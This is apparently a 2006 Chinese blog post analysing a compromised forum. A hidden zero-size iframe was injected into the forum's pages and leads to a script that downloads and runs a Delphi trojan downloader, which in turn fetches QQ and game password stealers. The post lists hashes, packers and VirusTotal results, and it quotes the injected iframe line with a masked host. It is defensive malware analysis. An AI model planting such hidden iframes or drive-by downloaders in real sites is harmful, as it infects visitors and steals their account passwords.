某论坛被加入下载Trojan-Downloader.Win32.Delf.ajm的代码

caobihole

浏览: 952419 次

最近访客更多访客>>

u012363178

jerry_shen

fish119

educationAAAA

博主相关

博客

微博

相册

留言

关于我

文章分类

全部博客 (1423)

社区版块

存档分类

2013-09 ( 92)
2013-08 ( 32)
2013-07 ( 23)
更多存档...

endurer 原创
2006-12-15 第1版

论坛首被加入代码：
/--------
＜iframe src=hxxp://www.z*z***yqr.com.**/lpf/wm.htm width=0 height=0 frameborder=0＞＜/iframe＞
--------/

wm.htm 的内容为JavaScript脚本程序，功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 /mc/game/lpf.exe，保存为 c:/boot.exe，并利用Shell.Application 对象的 ShellExecute 方法来运行。

lpf.exe 采用 Borland Delphi Setup Module 制作
/-------
文件说明符 : D:/virus/lpf.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2006-12-15 20:52:52
修改时间 : 2006-12-15 20:52:54
访问时间 : 2006-12-15 0:0:0
大小 : 15872 字节 15.512 KB
MD5 : 1914ec3e09f9bca86a10034ff9b3b985
-------/
Kaspersky报为 Trojan-Downloader.Win32.Delf.ajm,瑞星报为Trojan.DL.Multi.wen。

STATUS: FINISHED

Complete scanning result of "lpf.exe", received in VirusTotal at 12.15.2006, 14:28:30 (CET).

Antivirus	Version	Update	Result
AntiVir	7.3.0.15	12.15.2006	TR/Delphi.Downloader.Gen
Authentium	4.93.8	12.14.2006	Possibly a new variant of W32/SecRisk-ProcessPatcher-Sml-based!Maximus
Avast	4.7.892.0	12.15.2006	no virus found
AVG	386	12.15.2006	no virus found
BitDefender	7.2	12.15.2006	BehavesLike:Win32.ExplorerHijack
CAT-QuickHeal	8.00	12.14.2006	TrojanDownloader.Delf.ajm
ClamAV	devel-20060426	12.15.2006	Trojan.Downloader-51
DrWeb	4.33	12.15.2006	Trojan.DownLoader.14624
eSafe	7.0.14.0	12.14.2006	no virus found
eTrust-InoculateIT	23.73.86	12.15.2006	no virus found
eTrust-Vet	30.3.3252	12.15.2006	no virus found
Ewido	4.0	12.15.2006	Downloader.Delf.ajm
Fortinet	2.82.0.0	12.15.2006	no virus found
F-Prot	3.16f	12.14.2006	Possibly a new variant of W32/SecRisk-ProcessPatcher-Sml-based!Maximus
F-Prot4	4.2.1.29	12.14.2006	W32/SecRisk-ProcessPatcher-Sml-based!Maximus
Ikarus	T3.1.0.26	12.15.2006	no virus found
Kaspersky	4.0.2.24	12.15.2006	Trojan-Downloader.Win32.Delf.ajm
McAfee	4919	12.14.2006	Generic Delphi
Microsoft	1.1804	12.15.2006	no virus found
NOD32v2	1923	12.15.2006	probably a variant of Win32/TrojanDownloader.Delf.NDQ
Norman	5.80.02	12.15.2006	W32/Delf.TWZ
Panda	9.0.0.4	12.15.2006	Suspicious file
Prevx1	V2	12.15.2006	no virus found
Sophos	4.12.0	12.14.2006	no virus found
Sunbelt	2.2.907.0	11.30.2006	no virus found
TheHacker	6.0.3.132	12.14.2006	no virus found
UNA	1.83	12.14.2006	no virus found
VBA32	3.11.1	12.14.2006	no virus found
VirusBuster	4.3.19:9	12.14.2006	no virus found

Aditional Information
File size: 15872 bytes
MD5: 1914ec3e09f9bca86a10034ff9b3b985
SHA1: ad95735b4cb4ed24767801f3b3bde4823cd24281

lpf.exe会下载下列文件：
1）/mc/bao/lipengfei.exe

采用 UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo 加壳
/-------
文件说明符 : D:/virus/lipengfei.exe
属性 : A---
获取文件版本信息大小失败!创建时间 : 2006-12-15 21:2:56
修改时间 : 2006-12-15 21:2:58
访问时间 : 2006-12-15 0:0:0
大小 : 39069 字节 38.157 KB
MD5 : 8a91fe8298abe6d136e6e4a2071abb1e
-------/
瑞星报为：Trojan.PSW.QQPass.qxf

Complete scanning result of "lipengfei.exe", received in VirusTotal at 12.15.2006, 14:39:16 (CET).

Antivirus	Version	Update	Result
AntiVir	7.3.0.15	12.15.2006	DR/Delphi.Gen
Authentium	4.93.8	12.14.2006	no virus found
Avast	4.7.892.0	12.15.2006	Win32:QQPass-EU
AVG	386	12.15.2006	PSW.Generic2.SUE
BitDefender	7.2	12.15.2006	Generic.PWStealer.A771A4B9
CAT-QuickHeal	8.00	12.14.2006	no virus found
ClamAV	devel-20060426	12.15.2006	no virus found
DrWeb	4.33	12.15.2006	Trojan.PWS.Qqpass.326
eSafe	7.0.14.0	12.14.2006	suspicious Trojan/Worm
eTrust-InoculateIT	23.73.86	12.15.2006	Win32/QQPass.Variant!Trojan
eTrust-Vet	30.3.3252	12.15.2006	no virus found
Ewido	4.0	12.15.2006	Trojan.QQPass.ra
Fortinet	2.82.0.0	12.15.2006	no virus found
F-Prot	3.16f	12.14.2006	no virus found
F-Prot4	4.2.1.29	12.14.2006	no virus found
Ikarus	T3.1.0.26	12.15.2006	Trojan-PSW.Win32.Delf.IC
Kaspersky	4.0.2.24	12.15.2006	Trojan-PSW.Win32.QQPass.ra
McAfee	4919	12.14.2006	PWS-Hook.dll
Microsoft	1.1804	12.15.2006	no virus found
NOD32v2	1923	12.15.2006	probably a variant of Win32/PSW.QQShou.EP
Norman	5.80.02	12.15.2006	W32/QQPass.CHM
Panda	9.0.0.4	12.15.2006	Suspicious file
Prevx1	V2	12.15.2006	no virus found
Sophos	4.12.0	12.14.2006	no virus found
Sunbelt	2.2.907.0	11.30.2006	no virus found
TheHacker	6.0.3.132	12.14.2006	Trojan/PSW.QQPass.ra
UNA	1.83	12.14.2006	Trojan.PSW.Win32.QQPass.6EDE
VBA32	3.11.1	12.14.2006	BackDoor.Pigeon.516
VirusBuster	4.3.19:9	12.14.2006	no virus found

Aditional Information

File size: 39069 bytes
MD5: 8a91fe8298abe6d136e6e4a2071abb1e
SHA1: 6909040f888c037999d64a32f5ef90521602ab93
packers: UPX

2）/mc/pqpq.exe
采用nSPack 1.3 -> North Star/Liu Xing Ping 加壳
/-------
文件说明符 : D:/pe/virus/pqpq.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 0.00.0195
说明 :
版权 :
备注 :
产品版本 : 0.00.0195
产品名称 : Xcd
公司名称 : Xcd
合法商标 :
内部名称 : 23oigj
源文件名 : 23oigj.exe
创建时间 : 2006-12-15 21:3:12
修改时间 : 2006-12-15 21:3:14
访问时间 : 2006-12-15 0:0:0
大小 : 44151 字节 43.119 KB
MD5 : 04433d91f101e7c95d5d77c1cbe1efd6
-------/
瑞星报为：Trojan.PSW.Misc.kif

Complete scanning result of "pqpq.exe", received in VirusTotal at 12.15.2006, 14:47:23 (CET).

Antivirus	Version	Update	Result
AntiVir	7.3.0.15	12.15.2006	TR/PSW.Lmir.44151
Authentium	4.93.8	12.14.2006	Possibly a new variant of W32/Suspicious:VisualBasicMalware!Maximus
Avast	4.7.892.0	12.15.2006	no virus found
AVG	386	12.15.2006	no virus found
BitDefender	7.2	12.15.2006	Generic.PWSLmir.D80E5DAD
CAT-QuickHeal	8.00	12.14.2006	(Suspicious) - DNAScan
ClamAV	devel-20060426	12.15.2006	no virus found
DrWeb	4.33	12.15.2006	BackDoor.Generic.1482
eSafe	7.0.14.0	12.14.2006	suspicious Trojan/Worm
eTrust-InoculateIT	23.73.86	12.15.2006	no virus found
eTrust-Vet	30.3.3252	12.15.2006	no virus found
Ewido	4.0	12.15.2006	no virus found
Fortinet	2.82.0.0	12.15.2006	Spy/WOWSTEAL
F-Prot	3.16f	12.14.2006	Possibly a new variant of W32/Suspicious:VisualBasicMalware!Maximus
F-Prot4	4.2.1.29	12.14.2006	W32/Suspicious:VisualBasicMalware!Maximus
Ikarus	T3.1.0.26	12.15.2006	Backdoor.Win32.PcClient.GV
Kaspersky	4.0.2.24	12.15.2006	no virus found
McAfee	4919	12.14.2006	no virus found
Microsoft	1.1804	12.15.2006	PWS:Win32/Wowsteal.gen!A
NOD32v2	1923	12.15.2006	a variant of Win32/PSW.Legendmir
Norman	5.80.02	12.15.2006	no virus found
Panda	9.0.0.4	12.15.2006	Suspicious file
Prevx1	V2	12.15.2006	Trojan.SystemPoser
Sophos	4.12.0	12.14.2006	Mal/PWS-D
Sunbelt	2.2.907.0	11.30.2006	VIPRE.Suspicious
TheHacker	6.0.3.132	12.14.2006	no virus found
UNA	1.83	12.14.2006	no virus found
VBA32	3.11.1	12.14.2006	BackDoor.Generic.1482
VirusBuster	4.3.19:9	12.14.2006	novirus:Packed/NSPack

Aditional Information

File size: 44151 bytes
MD5: 04433d91f101e7c95d5d77c1cbe1efd6
SHA1: 26478a8cb49411d3e87132cdad2c82993bf545f2
packers: NSPACK
packers: Packed
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=cc5f62172717
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

3）/mc/gezi.exe 未能获取
4）/mc/dabao.exe 未能获取
5）/mc/xbao.exe 未能获取

保存为C:/Program Files/Common Files下的
1.exe
2.exe
3.exe
4.exe
5.exe

与此前发现的十分相似，不过文件的MD5不同。

分享到：

MASM32编程如何确保光标移至edit控件末 | Ajax：拥抱JSON，让XML走开

2006-12-15 21:58
浏览 717
评论(0)
查看更多

发表评论

您还没有登录,请您登录后再发表评论

最近访客更多访客>>

博主相关

文章分类

社区版块

存档分类

最新评论